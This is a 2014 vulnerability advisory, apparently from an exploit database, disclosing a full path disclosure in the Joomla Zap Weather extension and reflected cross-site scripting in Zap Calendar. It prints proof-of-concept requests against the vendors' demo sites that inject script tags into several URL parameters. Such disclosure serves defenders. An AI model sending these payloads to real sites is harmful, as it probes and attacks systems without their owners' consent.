Joomla Zap Weather FPD & Zap Calendar XSS

2014.01.21

Credit: Smash_

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Title - Joomla Zap Weather FPD & Zap Calendar XSS
#Date: 01.21.2014
#Vendor: zcontent.net ( extensions.joomla.org/extensions/owner/cogliano )
#Versions - Z Weather v9 & Zap Calendar v4.0 (Latests ATM)
#Contant: smash[at]devilteam.pl
#Zap Weather
PoC - zcontent.net/demo/zapweather
1. Full Path Disclosure
Request:
zcontent.net/demo/zapweather?view=location&id[]=5layout=alert&tmpl=component
OR
http://zcontent.net/demo/zapweather?view=location&id=-666&layout=alert&tmpl=component
Error appears:
Error
Failed loading XML file
Warning: Invalid argument supplied for foreach() in /var/www/zcontent/libraries/joomla/database/database.php on line 1315
Warning: Invalid argument supplied for foreach() in /var/www/zcontent/libraries/joomla/database/database.php on line 1315
Warning: Invalid argument supplied for foreach() in /var/www/zcontent/components/com_zweather/views/location/view.html.php on line 324
#Zap Calendar
1. Cross Site Scripting at Events
- Itemid
GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196&calid=1&Itemid=118"><script>alert(666)</script>&tmpl=component HTTP/1.1
Host: www.zapcalendar.com
- Calid
GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196&calid=1"><script>alert(666)</script>&Itemid=118&tmpl=component HTTP/1.1
Host: www.zapcalendar.com
- Id
GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196"><script>alert(666)</script>&calid=1&Itemid=118&tmpl=component HTTP/1.1
Host: www.zapcalendar.com
2. Cross Site Scripting at Calendar
- Itemid
Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118"><script>alert(666)</script>&option=com_zcalendar&view=calendar&id=1&ctype=m&ajax=1&format=raw&date=2014-05-01&limitstart=0
- Ctype
Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118&option=com_zcalendar&view=calendar&id=1&ctype=m"><script>alert(666)</script>&ajax=1&format=raw&date=2014-05-01&limitstart=0
- Date
Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118&option=com_zcalendar&view=calendar&id=1&ctype=m&ajax=1&format=raw&date=2014-05-01"><script>alert(666)</script>&limitstart=0

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Zap Weather FPD & Zap Calendar XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.